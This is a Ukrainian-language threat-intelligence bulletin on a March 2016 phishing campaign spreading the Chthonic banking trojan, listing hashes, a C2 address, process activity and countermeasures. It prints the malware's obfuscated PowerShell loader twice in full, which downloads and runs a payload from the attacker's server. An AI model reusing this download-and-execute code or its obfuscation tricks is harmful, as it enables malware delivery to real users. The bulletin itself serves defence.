IOC_chthonic_160318
Доброго дня, панове.
Візьміть до уваги маркери ще по одній розсилці.
16го березня проходила розсилка шкідливого коду типу #chthonic (варіація #zbot).
Рівень загрози – середній. Для тих, хто уважно читає наші поради – низький.
Включили цей зразок в розсилку оскільки станом на сьогодні джерело досі активне.
Трохи аналітики:
- Враховуючи почерк цієї команди слід очікувати нових зразків із цим посиланням
- Цього разу сервер розповсюдження=серверу контролю (С2)
- Схема та сама – обфусковані JS скрипти в архіві, претекст та фейкові скани документів
- Скрипт чітко вказує одну адресу та ім’я, під яким payload записується на диск
- Завантаження основної частини засобами Powershell
- Основна частина по аналогії із #Zbot змінює контрольну суму та маскується під різні додатки
- Не потребує прав Адміністратора
- Цей домен та шлях завантаження уже використовувався 23/02
- В черговий раз звертаємо увагу на механізм WSH та PowerShell – якщо не застосовуєте, то обмежуйте
Схема атаки:
email > Attach (RAR) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL > ' h11p:\vivedoc{.} ru\document/pax.exe' > $env:temp + '\49552.exe
Маркери IOC:
Приєднання (архів):
SHA-256 78f7289a3e1967c5f6c3c756004801965f2b6944bd214fbca3d7744ffc7c595a File name договор и сканы Яковлевой по ТОВ РІДАН.rar File size 71.36 KB
скрипт приманка:
SHA-256 f36f979625dd6e6b85a0d8e44d04b61f607ef2edcc3431916bf7c27cb63f17d4 File name договір послуг №71-18р.xls.js File size 34.3 KB
основна частина (джерело станом на 19/03):
SHA-256 31301e4353110752a224d936390ad3ccd59c399c0290800ef150cf8e989c4888 File name pax.exe >> $env:temp + '\49552.exe File size 393.5 KB
Перший запуск:
SHA-256 e5791ceb76d0aa9dc177dc91ed76d3eb1c425bbca73fcdb3289a5cb29801a6db File name Mozillasync.exe File size 393.5 KB
Другий запуск:
SHA-256 2fed4e7b0b103570df53e62ed428d36652c0ddb74e3dae7957574ab8379a681c File name StartXnView.exe File size 393.5 KB
основна частина (джерело станом на 20/03):
SHA-256 288086fd96072b0023cb5b148d26786c919361d5e2649303968e1ceca71d1b30 File name pax.exe File size 312 KB
Мережеві IOC:
завантаження payload – станом на 20/03 досі активна!
92.63.197.13 vivedoc{.} ru GET /document/pax.exe HTTP/1.1 HTTP 339 Mozilla/4.0 (compatible; MSIE 7.0)
трафік скомпрометованої системи – сервер контролю (так само як і минулого разу)
92.63.197.13 vivedoc{.} ru POST /web/ HTTP/1.1 HTTP 551 Mozilla/7.1 (compatible; MSIE 7.1; Windows NT 6.2; SV1) (Минулого разу – той самий, 92.63.197.13 honeyindoc{.} ru POST / HTTP/1.1 (application/x-www-form-urlencoded))
Зразок запускає декілька копій iexplorer та ініціює відволікаючі з’єднання:
explorer.exe 1952 TCP 10.0.2.15 49393 92.63.197.13 80 ESTABLISHED explorer.exe 1952 TCP 10.0.2.15 49394 92.63.197.13 80 ESTABLISHED iexplore.exe 2916 TCP 10.0.2.15 49390 204.79.197.200 80 ESTABLISHED explorer.exe 1952 TCP 10.0.2.15 49397 172.217.20.196 80 ESTABLISHED explorer.exe 1952 TCP 10.0.2.15 49398 172.217.20.196 443 ESTABLISHED iexplore.exe 2916 TCP 10.0.2.15 49390 204.79.197.200 80 ESTABLISHED
Активність по процесам:
Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell
Кожен запуск призводить до запису основної частини у %temp% а потім зразок копіює себе у довільний каталог, залежно від додатку під який він мімікрує
“C:\Windows\System32\WScript.exe” “C:\Users\operator\Desktop\договір послуг №71-18р.xls.js”
“C:\Windows\System32\cmd.exe” /k set _a111=powe&& set _a222=rsh&& set _a333=ell&& call %_a111%%_a222%%_a333% $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object -ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘\49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:\vivedoc{.} ru\document/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start-Process $path;
powershell $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object -ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘\49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:\vivedoc{.} ru\document/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start-Process $path;
“C:\Users\operator\AppData\Local\Temp\49552.exe“
“C:\Users\operator\AppData\Roaming\Mozilla\Mozillasync.exe“
“C:\Windows\system32\cmd.exe” /c “C:\Users\operator\AppData\Local\Temp\tmp31ff2b60.bat”
Закріплення через HCU (так само як і минулого разу)
Перший запуск {E1E44CAA-17DF-58EA-6A9B-F8A8F27ED919} c:\users\operator\appdata\roaming\mozilla\mozillasync.exe 1/19/2015 9:56 PM Другий запуск {77947C66-8A05-1E12-8FC2-D14DA2AE84DD} c:\users\operator\appdata\roaming\xnview\startxnview.exe 1/19/2015 9:56 PM
Контрзаходи:
- Перевірка журналів мережевого обладнання по наданим маркерам
- Обмеження передачі запускних файлів по каналам Web та Email (payload не кодований)
- Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
- Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
- Деактивація механізму Windows Script Host (варіант 2й)
- Якщо ж Powershell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
- Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю C:\Users\**\ !
- Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
- Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
- Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
- Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії
Будьте уважні та обережні!
VR